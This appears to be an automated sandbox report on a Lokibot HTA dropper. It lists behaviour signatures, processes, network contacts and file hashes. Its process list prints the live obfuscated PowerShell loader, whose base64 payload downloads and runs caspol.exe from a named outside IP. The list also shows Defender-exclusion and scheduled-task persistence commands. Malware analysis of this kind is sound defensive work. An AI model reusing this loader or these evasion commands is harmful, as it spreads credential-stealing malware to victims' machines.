Analysis Overview
SHA256
a786cb2ae0dc8117e3bfc07bca8bb0e5d4545ab8f5b4aa042c9ee85dca7b43a0
Threat Level: Known bad
The file a786cb2ae0dc8117e3bfc07bca8bb0e5d4545ab8f5b4aa042c9ee85dca7b43a0.hta was found to be: Known bad.
Malicious Activity Summary
Lokibot family
Lokibot
Evasion via Device Credential Deployment
Blocklisted process makes network request
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Reads user/profile data of web browsers
Executes dropped EXE
Checks computer location settings
Loads dropped DLL
Accesses Microsoft Outlook profiles
Suspicious use of SetThreadContext
Enumerates physical storage devices
System Location Discovery: System Language Discovery
outlook_win_path
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Scheduled Task/Job: Scheduled Task
outlook_office_path
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-21 07:35
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-21 07:35
Reported
2024-11-21 07:38
Platform
win10v2004-20241007-en
Max time kernel
38s
Max time network
144s
Command Line
Signatures
Lokibot
Lokibot family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4724 set thread context of 904 | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | C:\Users\Admin\AppData\Roaming\caspol.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\a786cb2ae0dc8117e3bfc07bca8bb0e5d4545ab8f5b4aa042c9ee85dca7b43a0.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe
"C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fqh3jphh\fqh3jphh.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC2A4.tmp" "c:\Users\Admin\AppData\Local\Temp\fqh3jphh\CSCBF6C05B6915448E28F66191B9F6A879C.TMP"
C:\Users\Admin\AppData\Roaming\caspol.exe
"C:\Users\Admin\AppData\Roaming\caspol.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\rrwscqkDSNwLK.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\Admin\AppData\Local\Temp\tmp343A.tmp"
C:\Users\Admin\AppData\Roaming\caspol.exe
"C:\Users\Admin\AppData\Roaming\caspol.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 192.3.243.136:80 | 192.3.243.136 | tcp |
| US | 8.8.8.8:53 | 136.243.3.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| DE | 94.156.177.41:80 | 94.156.177.41 | tcp |
| US | 8.8.8.8:53 | 41.177.156.94.in-addr.arpa | udp |
| DE | 94.156.177.41:80 | 94.156.177.41 | tcp |
| DE | 94.156.177.41:80 | 94.156.177.41 | tcp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| DE | 94.156.177.41:80 | 94.156.177.41 | tcp |
Files
memory/2764-0-0x000000007119E000-0x000000007119F000-memory.dmp
memory/2764-1-0x00000000025F0000-0x0000000002626000-memory.dmp
memory/2764-3-0x0000000071190000-0x0000000071940000-memory.dmp
memory/2764-2-0x0000000005120000-0x0000000005748000-memory.dmp
memory/2764-4-0x0000000071190000-0x0000000071940000-memory.dmp
memory/2764-5-0x00000000050A0000-0x00000000050C2000-memory.dmp
memory/2764-7-0x0000000005870000-0x00000000058D6000-memory.dmp
memory/2764-6-0x0000000005800000-0x0000000005866000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kxcfel11.13o.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2764-17-0x00000000059E0000-0x0000000005D34000-memory.dmp
memory/2764-18-0x0000000005EE0000-0x0000000005EFE000-memory.dmp
memory/2764-19-0x0000000005F90000-0x0000000005FDC000-memory.dmp
memory/2640-29-0x00000000073A0000-0x00000000073D2000-memory.dmp
memory/2640-30-0x000000006DA50000-0x000000006DA9C000-memory.dmp
memory/2640-40-0x0000000007380000-0x000000000739E000-memory.dmp
memory/2640-41-0x00000000073F0000-0x0000000007493000-memory.dmp
memory/2640-42-0x0000000007B70000-0x00000000081EA000-memory.dmp
memory/2640-43-0x0000000007520000-0x000000000753A000-memory.dmp
memory/2640-44-0x0000000007580000-0x000000000758A000-memory.dmp
memory/2640-45-0x00000000077B0000-0x0000000007846000-memory.dmp
memory/2640-46-0x0000000007720000-0x0000000007731000-memory.dmp
memory/2640-47-0x0000000007750000-0x000000000775E000-memory.dmp
memory/2640-48-0x0000000007760000-0x0000000007774000-memory.dmp
memory/2640-49-0x0000000007870000-0x000000000788A000-memory.dmp
memory/2640-50-0x00000000077A0000-0x00000000077A8000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\fqh3jphh\fqh3jphh.cmdline
| MD5 | 398a9341ef888048c2256e68b5d90427 |
| SHA1 | 7384a1d094a0515737408fab45c9511f5be82ea1 |
| SHA256 | ed7ccb2559c691dca3653465f397a16f66b371689820b263f6ad830cbd11e8cc |
| SHA512 | 806e01a9efafe92d9267dec26d8c44a8c2c6aded26e8cccaedbc0dad322db55ccd02e3d7b3923e488b0c25b72168cc31ddf7c5d50a7924c705b8e9be62cca377 |
\??\c:\Users\Admin\AppData\Local\Temp\fqh3jphh\fqh3jphh.0.cs
| MD5 | fe82050659a8b97690d60529499222c1 |
| SHA1 | 7cc50135852b46dd1e36f2ff98506613db525a68 |
| SHA256 | 64c38563c4588b718b03aec685677f173456d3c961ef97cd95e7784ee1e51a6a |
| SHA512 | 59356fd5cbb38a06bf09e182b8ed7c7c2200e6f8de8e950be38bee0c45aa96b2dbf202bdc56097a74acc4e0a8bc601558e83c098a376630cfa1bcce64133d64f |
\??\c:\Users\Admin\AppData\Local\Temp\fqh3jphh\CSCBF6C05B6915448E28F66191B9F6A879C.TMP
| MD5 | 78057cdba99e48d2a36a65e34ccb752e |
| SHA1 | 309542f3a0fb421734838098e41c77d16ddaa683 |
| SHA256 | 014c2d366cd42a7740e7a573ce361bb9e0e2e3fe2e73579ee02411216079e9a5 |
| SHA512 | ac4271b3ebfe9b61202e2b08446c42f4850541cb7e9f44601587ddb94455ac1cf0b8fa7e85aa81b836530ffabff788eaa217b8700841f99743e3b6a133f4076b |
C:\Users\Admin\AppData\Local\Temp\RESC2A4.tmp
| MD5 | f200ef92016b45489bbd235ba63f71a5 |
| SHA1 | 9ae2ab3e4567df9dac68046856d9a1378dd72557 |
| SHA256 | 4765bb4f074b80fc37d18c430c073c5931d6a85f3ba2b09c6001375916b830ef |
| SHA512 | 3f61853742dea30e1bd5b1552e00feea8a44ca266d0773a5ec8e7ab1c684ada105e496400977cd39f84f2ebfc461f7b958263037a39c30641ea952c7d5a0b80d |
C:\Users\Admin\AppData\Local\Temp\fqh3jphh\fqh3jphh.dll
| MD5 | d8ed4e58a37e9303aec70f150a049565 |
| SHA1 | 810460053f97d0e42c00b4d8c0651bb9150556e0 |
| SHA256 | 13544ebaea46b47daef3682d90c40f48f8f6be12bde9875a1c1edadfd3a62676 |
| SHA512 | 41acd4a6c2c560dcb1cf73e7fd4d87dc9ed14f2fa6169e98d2ab483495aca3d5ed995dac4d7640bad2d5ffc7cb63a64bf34a61b9fc194b6bfdfcf2a54fedadcc |
memory/2764-65-0x0000000006490000-0x0000000006498000-memory.dmp
memory/2764-71-0x000000007119E000-0x000000007119F000-memory.dmp
memory/2764-72-0x0000000071190000-0x0000000071940000-memory.dmp
memory/2764-73-0x0000000071190000-0x0000000071940000-memory.dmp
C:\Users\Admin\AppData\Roaming\caspol.exe
| MD5 | 74061922f1e78c237a66d12a15a18181 |
| SHA1 | e31ee444aaa552a100f006e43f0810497a3b0387 |
| SHA256 | 89bf888148eae2caabdc6d3fff98054127b197b402493581894a3104ed6b6f1c |
| SHA512 | 306744107d78b02ecfd28252dae954f0b47c1f761e15a33c937474a2e15284c17bb7e2542618b745ea5f95e5a7dba3d27b675c8837914a44d8b5b350a3d4a136 |
memory/4724-82-0x0000000000430000-0x00000000004C8000-memory.dmp
memory/4724-84-0x00000000052E0000-0x0000000005884000-memory.dmp
memory/4724-85-0x0000000004DD0000-0x0000000004E62000-memory.dmp
memory/4724-86-0x0000000004D90000-0x0000000004D9A000-memory.dmp
memory/4724-87-0x0000000005080000-0x000000000511C000-memory.dmp
memory/2764-83-0x0000000071190000-0x0000000071940000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pOweRShelL.EXe.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c07d4a9c3cab5bb865ebdd573a366558 |
| SHA1 | 50c0b6fa427d3672cb673ed0c9986d637cd059a8 |
| SHA256 | e4c875a5953bc9853f79cbbb5e7dbf8c678422b5c15232f85600d2610635b3f7 |
| SHA512 | 44fa77691d15f73d815ddbdbd831123f48a8a8b796de2b3942ac6560ff4cf6624de507800c9b9a7bbd990b48ca24edb4af54a09b0ece8051afe11e73a0ad36ec |
memory/4724-88-0x0000000004FC0000-0x0000000004FD2000-memory.dmp
memory/4724-89-0x0000000006740000-0x00000000067A4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp343A.tmp
| MD5 | d3259388c1295044ac9efaf15c965790 |
| SHA1 | d1b7dfd6424159d1e838f2e6f8ab217cdcf06d2b |
| SHA256 | 61b1bfad298759fc3534d796ecafcce4088086c498ae9aa7eb0537715d959090 |
| SHA512 | ec4955def3e77a72789979919808f67daae0ec32d77daf1184d7e6ef8417e6c0843ea484872ba69cdb1f3ad8e983e44f1b424f9896c613224acda0f5ff15aabc |
memory/904-116-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/4828-119-0x00000000060F0000-0x000000000613C000-memory.dmp
memory/904-114-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/4828-95-0x0000000005390000-0x00000000056E4000-memory.dmp
memory/3704-136-0x0000000007400000-0x00000000074A3000-memory.dmp
memory/4828-130-0x000000006DFE0000-0x000000006E02C000-memory.dmp
memory/3704-120-0x000000006DFE0000-0x000000006E02C000-memory.dmp
memory/3704-144-0x0000000007770000-0x0000000007781000-memory.dmp
memory/3704-145-0x00000000077B0000-0x00000000077C4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 38202961910eba1dae31b0abea906f2c |
| SHA1 | 8a816445bd72cc54ebd0d0d028dec8877dd9184f |
| SHA256 | a409c21e7b7967dd8b9d6c851bb0a506367ec24f9c3bb2f380900e53f362e7e2 |
| SHA512 | bb25cf01e0dafbde499fa2ea1b4446443e07b5988fd601f617fc4d28aa090267e27b2193f12178fbd1dd2223412473463cba537f357d82effb611999bfe47257 |
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2878641211-696417878-3864914810-1000\0f5007522459c86e95ffcc62f32308f1_4fc725d8-4f7d-4884-b878-08bb0ce6c800
| MD5 | d898504a722bff1524134c6ab6a5eaa5 |
| SHA1 | e0fdc90c2ca2a0219c99d2758e68c18875a3e11e |
| SHA256 | 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9 |
| SHA512 | 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61 |
memory/904-165-0x0000000000400000-0x00000000004A2000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2878641211-696417878-3864914810-1000\0f5007522459c86e95ffcc62f32308f1_4fc725d8-4f7d-4884-b878-08bb0ce6c800
| MD5 | c07225d4e7d01d31042965f048728a0a |
| SHA1 | 69d70b340fd9f44c89adb9a2278df84faa9906b7 |
| SHA256 | 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a |
| SHA512 | 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b |
memory/904-172-0x0000000000400000-0x00000000004A2000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-21 07:35
Reported
2024-11-21 07:38
Platform
win7-20240903-en
Max time kernel
118s
Max time network
119s
Command Line
Signatures
Lokibot
Lokibot family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2640 set thread context of 2244 | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | C:\Users\Admin\AppData\Roaming\caspol.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
